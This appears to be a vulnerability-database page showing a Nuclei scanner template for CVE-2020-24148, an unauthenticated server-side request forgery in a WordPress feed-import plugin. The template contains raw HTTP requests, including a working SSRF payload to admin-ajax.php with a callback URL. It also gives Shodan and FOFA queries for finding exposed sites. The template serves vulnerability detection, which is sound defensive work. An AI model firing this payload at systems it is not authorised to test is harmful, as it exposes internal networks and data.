Lucene search
K

Import XML & RSS Feeds WordPress Plugin <= 2.0.1 Server-Side Request Forgery

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 40 Views

WordPress Plugin <= 2.0.1 SSRF Vulnerability via Import XML & RSS Feed

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNNVD
WordPress 代码问题漏洞
7 Jul 202100:00
cnnvd
CNVD
WordPress server-side request forgery vulnerability (CNVD-2021-59066)
9 Jul 202100:00
cnvd
CVE
CVE-2020-24148
7 Jul 202113:39
cve
Cvelist
CVE-2020-24148
7 Jul 202113:39
cvelist
GithubExploit
Exploit for Server-Side Request Forgery in Mooveagency Import_Xml_And_Rss_Feeds
12 Jul 202102:01
githubexploit
NVD
CVE-2020-24148
7 Jul 202114:15
nvd
OSV
CVE-2020-24148
7 Jul 202114:15
osv
Patchstack
WordPress Import XML and RSS Feeds plugin <= 2.0.1 - Server-Side Request Forgery (SSRF) vulnerability
22 Sep 202000:00
patchstack
Prion
Server side request forgery (ssrf)
7 Jul 202114:15
prion
RedhatCVE
CVE-2020-24148
22 May 202516:14
redhatcve
Rows per page
id: CVE-2020-24148

info:
  name: Import XML & RSS Feeds WordPress Plugin <= 2.0.1 Server-Side Request Forgery
  author: dwisiswant0
  severity: critical
  description: WordPress plugin Import XML and RSS Feeds (import-xml-feed) plugin 2.0.1 contains a server-side request forgery (SSRF) vulnerability via the data parameter in a moove_read_xml action.
  impact: |
    Unauthenticated attackers can perform server-side request forgery to access internal resources, scan internal networks, or retrieve sensitive data from internal systems.
  remediation: |
    Update to the latest version of the Import XML & RSS Feeds WordPress Plugin (2.0.2 or higher) to mitigate the vulnerability.
  reference:
    - https://github.com/dwisiswant0/CVE-2020-24148
    - https://wordpress.org/plugins/import-xml-feed/#developers
    - https://nvd.nist.gov/vuln/detail/CVE-2020-24148
    - https://github.com/secwx/research/blob/main/cve/CVE-2020-24148.md
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2020-24148
    cwe-id: CWE-918
    epss-score: 0.14745
    epss-percentile: 0.96267
    cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:2.0.1:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: mooveagency
    product: import_xml_and_rss_feeds
    framework: wordpress
    shodan-query: http.html:"import-xml-feed"
    fofa-query: body="import-xml-feed"
  tags: cve,cve2020,wordpress,wp-plugin,ssrf,mooveagency,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Import XML feed'

  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=moove_read_xml HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        type=url&data=http%3A%2F%2F{{interactsh-url}}%2F&xmlaction=preview&node=0

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 490a00463044022016c0cfb4a11f9d7a8fd6467851fd97a1229193c1f531b75274fb8a2b61d481d802202f1a9c76ee3664321daed6cb3b4a6c70d872a200ec967e7857226c786b3a27b9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 26.4
CVSS 3.19.1
EPSS0.14745
40